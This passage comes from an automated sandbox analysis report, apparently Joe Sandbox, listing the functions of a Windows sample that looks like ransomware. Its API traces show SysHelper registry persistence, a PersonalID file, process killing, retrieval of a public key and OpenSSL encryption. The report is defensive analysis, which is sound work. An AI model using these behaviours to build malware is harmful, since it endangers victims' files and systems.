                                                                                                                                        • GetLastError.KERNEL32(?,?,00000000), ref: 004654D4
                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 004654F7
                                                                                                                                        • GetLastError.KERNEL32(?,?,00000000), ref: 00465503
                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00465531
                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 0046555B
                                                                                                                                        • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 004655F5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                        • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                                                                                                                                        • API String ID: 1717984340-2085858615
                                                                                                                                        • Opcode ID: 5bed85aa8c1b563afb7458887addcfa84ee938cd819de717f6d53dc9ad9ea7b7
                                                                                                                                        • Instruction ID: 21cfcf061b86b0f752f7d9b12bec731e5652c25b667fcf3b1ac9b742683446ef
                                                                                                                                        • Opcode Fuzzy Hash: 5bed85aa8c1b563afb7458887addcfa84ee938cd819de717f6d53dc9ad9ea7b7
                                                                                                                                        • Instruction Fuzzy Hash: 5A518E71B40704BBEB206B61DC47FBF7769AF05715F40012BFD05BA2C1E669490186AB
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00425B6E Relevance: 15.1, APIs: 10, Instructions: 131COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 790675137-0
                                                                                                                                        • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                                                                                                                        • Instruction ID: 0fe30f67420a0b57e0336c9221d2143c2ac41a82f10de3dc78134a272e9def7d
                                                                                                                                        • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                                                                                                                        • Instruction Fuzzy Hash: BE412932700724AFDB11AFA6B886B9E7BE0EF44318F90802FF51496282DB7D9544DB1D
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0040C740 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 254COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00420FDD: __wfsopen.LIBCMT ref: 00420FE8
                                                                                                                                        • _fgetws.LIBCMT ref: 0040C7BC
                                                                                                                                        • _memmove.LIBCMT ref: 0040C89F
                                                                                                                                        • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0040C94B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateDirectory__wfsopen_fgetws_memmove
                                                                                                                                        • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                                                        • API String ID: 2864494435-54166481
                                                                                                                                        • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                                                                        • Instruction ID: 3a80d152ee3a33a632d987be3a831cd6f981e29f6d1810208bb328cacc5ceb60
                                                                                                                                        • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                                                                        • Instruction Fuzzy Hash: 449193B2E00219DBCF20DFA5D9857AFB7B5AF04304F54463BE805B3281E7799A44CB99
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00412440 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52processCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0041244F
                                                                                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412469
                                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004124A1
                                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000009), ref: 004124B0
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004124B7
                                                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 004124C1
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004124CD
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                                                        • String ID: cmd.exe
                                                                                                                                        • API String ID: 2696918072-723907552
                                                                                                                                        • Opcode ID: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
                                                                                                                                        • Instruction ID: b239e8364e8e77cb7af63d5752a1eab109cf3eb7ce5fcb3b526656d556a9da04
                                                                                                                                        • Opcode Fuzzy Hash: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
                                                                                                                                        • Instruction Fuzzy Hash: ED0192355012157BE7206BA1AC89FAF766CEB08714F0400A2FD08D2141EA6489408EB9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0040F310 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 311libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryW.KERNEL32(Shell32.dll), ref: 0040F338
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0040F353
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                        • String ID: SHGetFolderPathW$Shell32.dll$\
                                                                                                                                        • API String ID: 2574300362-2555811374
                                                                                                                                        • Opcode ID: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
                                                                                                                                        • Instruction ID: 879cb2c41796572bb27552663435674e3d239ec9c812fe4031d18dca963833e9
                                                                                                                                        • Opcode Fuzzy Hash: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
                                                                                                                                        • Instruction Fuzzy Hash: DFC15A70D00209EBDF10DFA4DD85BDEBBB5AF14308F10443AE405B7291EB79AA59CB99
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0040CBA0 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 240COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _malloc$__except_handler4_fprintf
                                                                                                                                        • String ID: &#160;$Error encrypting message: %s$\\n
                                                                                                                                        • API String ID: 1783060780-3771355929
                                                                                                                                        • Opcode ID: 779349bd5cffae9da37cda92e0556b786322a556b4ba80c6d8d46dbb3173291c
                                                                                                                                        • Instruction ID: bc568b6946d652cfd5b4c77746d66a5f57144f99ddafb1662d710ebef24806c3
                                                                                                                                        • Opcode Fuzzy Hash: 779349bd5cffae9da37cda92e0556b786322a556b4ba80c6d8d46dbb3173291c
                                                                                                                                        • Instruction Fuzzy Hash: 10A196B1C00249EBEF10EF95DD46BDEBB75AF10308F54052DE40576282D7BA5688CBAA
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00463350 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 148COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _strncmp
                                                                                                                                        • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                                                                                                                                        • API String ID: 909875538-2908105608
                                                                                                                                        • Opcode ID: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                                                                                                                                        • Instruction ID: 5da15f4c8f0622be9955200bbf206a62195e74188b9aea783317ae4bc8ba6fc6
                                                                                                                                        • Opcode Fuzzy Hash: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                                                                                                                                        • Instruction Fuzzy Hash: B7413EA1BC83C129F721592ABC03F9763854B51B17F080467FA88E52C3FB9D8987419F
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0040C6A0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 0040C6C2
                                                                                                                                        • RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0040C700
                                                                                                                                        • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 0040C725
                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0040C72E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseValue$OpenQuery
                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                                                                                                                                        • API String ID: 3962714758-1667468722
                                                                                                                                        • Opcode ID: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                                                                                                                                        • Instruction ID: 83d53c3b81c5c3826f22504a9cab54a14a7287ca0244f3776693af22b4817dfa
                                                                                                                                        • Opcode Fuzzy Hash: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                                                                                                                                        • Instruction Fuzzy Hash: 60112D7594020CFBDB109F91CC86FEEBB78EB04708F2041A5FA04B22A1D7B55B14AB58
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0041E6E8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 44stringnetworkfileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 0041E707
                                                                                                                                          • Part of subcall function 0040C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
                                                                                                                                        • InternetOpenW.WININET ref: 0041E743
                                                                                                                                        • _wcsstr.LIBCMT ref: 0041E7AE
                                                                                                                                        • _memmove.LIBCMT ref: 0041E838
                                                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 0041E90A
                                                                                                                                        • lstrcatW.KERNEL32(?,&first=false), ref: 0041E93D
                                                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0041E954
                                                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0041E96F
                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041E98C
                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041E9A3
                                                                                                                                        • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0041E9CD
                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0041E9F3
                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0041E9F6
                                                                                                                                        • _strstr.LIBCMT ref: 0041EA36
                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EA59
                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EA74
                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0041EA82
                                                                                                                                        • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0041EA92
                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 0041EAA4
                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 0041EABA
                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0041EAC8
                                                                                                                                        • lstrlenA.KERNEL32(00000022), ref: 0041EAE3
                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 0041EB5B
                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0041EB7C
                                                                                                                                        • _malloc.LIBCMT ref: 0041EB86
                                                                                                                                        • _memset.LIBCMT ref: 0041EB94
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0041EBAE
                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 0041EBB6
                                                                                                                                        • _strstr.LIBCMT ref: 0041EBDA
                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EC00
                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EC24
                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0041EC32
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
                                                                                                                                        • String ID: bowsakkdestx.txt${"public_key":"
                                                                                                                                        • API String ID: 2805819797-1771568745
                                                                                                                                        • Opcode ID: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
                                                                                                                                        • Instruction ID: c8d03ce4d59ef2fdab541fe9505dce31f646fa9b39186cada3cd653a8fd1c75a
                                                                                                                                        • Opcode Fuzzy Hash: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
                                                                                                                                        • Instruction Fuzzy Hash: 3901D234448391ABD630DF119C45FDF7B98AF51304F44482EFD8892182EF78A248879B
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004573F0 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 251COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __aulldvrm
                                                                                                                                        • String ID: $+$0123456789ABCDEF$0123456789abcdef$UlE
                                                                                                                                        • API String ID: 1302938615-3129329331
                                                                                                                                        • Opcode ID: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
                                                                                                                                        • Instruction ID: ba297de4fec08f8b73c8771b24cc4328c1ae3ea447eff3a94226dc6813255680
                                                                                                                                        • Opcode Fuzzy Hash: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
                                                                                                                                        • Instruction Fuzzy Hash: D181AEB1A087509FD710CF29A84062BBBE5BFC9755F15092EFD8593312E338DD098B96
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004306EC Relevance: 10.6, APIs: 7, Instructions: 84COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • ___unDName.LIBCMT ref: 0043071B
                                                                                                                                        • _strlen.LIBCMT ref: 0043072E
                                                                                                                                        • __lock.LIBCMT ref: 0043074A
                                                                                                                                        • _malloc.LIBCMT ref: 0043075C
                                                                                                                                        • _malloc.LIBCMT ref: 0043076D
                                                                                                                                        • _free.LIBCMT ref: 004307B6
                                                                                                                                          • Part of subcall function 004242FD: IsProcessorFeaturePresent.KERNEL32(00000017,004242D1,i;B,?,?,00420CE9,0042520D,?,004242DE,00000000,00000000,00000000,00000000,00000000,0042981C), ref: 004242FF
                                                                                                                                        • _free.LIBCMT ref: 004307AF
                                                                                                                                          • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                                                                                                                          • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free_malloc$ErrorFeatureFreeHeapLastNamePresentProcessor___un__lock_strlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3704956918-0
                                                                                                                                        • Opcode ID: 32e7d4c3d8e68485970837e3b5b585c67490908ba1c4539466c19c6bf2906932
                                                                                                                                        • Instruction ID: 67f118bcdaa5faec8c00adc58c02bfbdeebce6865ed580ae06d436c8457e8144
                                                                                                                                        • Opcode Fuzzy Hash: 32e7d4c3d8e68485970837e3b5b585c67490908ba1c4539466c19c6bf2906932
                                                                                                                                        • Instruction Fuzzy Hash: 3121DBB1A01715ABD7219B75D855B2FB7D4AF08314F90922FF4189B282DF7CE840CA98
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00411B10 Relevance: 10.6, APIs: 7, Instructions: 50timewindowsleepCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • timeGetTime.WINMM ref: 00411B1E
                                                                                                                                        • timeGetTime.WINMM ref: 00411B29
                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B4C
                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00411B5C
                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B6A
                                                                                                                                        • Sleep.KERNEL32(00000064), ref: 00411B72
                                                                                                                                        • timeGetTime.WINMM ref: 00411B78
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageTimetime$Peek$DispatchSleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3697694649-0
                                                                                                                                        • Opcode ID: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
                                                                                                                                        • Instruction ID: 47d0c5dc5d1eae46eaa001befe89e32fbe66e83151f6641dec248f991c3ab793
                                                                                                                                        • Opcode Fuzzy Hash: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
                                                                                                                                        • Instruction Fuzzy Hash: EE017532A40319A6DB2097E59C81FEEB768AB44B40F044066FB04A71D0E664A9418BA9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00425141 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __init_pointers.LIBCMT ref: 00425141
                                                                                                                                          • Part of subcall function 00427D6C: EncodePointer.KERNEL32(00000000,?,00425146,00423FFE,00507990,00000014), ref: 00427D6F
                                                                                                                                          • Part of subcall function 00427D6C: __initp_misc_winsig.LIBCMT ref: 00427D8A
                                                                                                                                          • Part of subcall function 00427D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004326B3
                                                                                                                                          • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004326C7
                                                                                                                                          • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004326DA
                                                                                                                                          • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004326ED
                                                                                                                                          • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00432700
                                                                                                                                          • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00432713
                                                                                                                                          • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00432726
                                                                                                                                          • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00432739
                                                                                                                                          • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0043274C
                                                                                                                                          • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0043275F
                                                                                                                                          • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00432772
                                                                                                                                          • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00432785
                                                                                                                                          • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00432798
                                                                                                                                          • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004327AB
                                                                                                                                          • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004327BE
                                                                                                                                          • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 004327D1
                                                                                                                                        • __mtinitlocks.LIBCMT ref: 00425146
                                                                                                                                        • __mtterm.LIBCMT ref: 0042514F
                                                                                                                                          • Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B62
                                                                                                                                          • Part of subcall function 004251B7: _free.LIBCMT ref: 00428B69
                                                                                                                                          • Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(0050AC00,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B8B
                                                                                                                                        • __calloc_crt.LIBCMT ref: 00425174
                                                                                                                                        • __initptd.LIBCMT ref: 00425196
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0042519D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3567560977-0
                                                                                                                                        • Opcode ID: 2aee27b5b182f6f3ae5a16561744fd9baa8d574365a868c1e04c7c5c44b22f1c
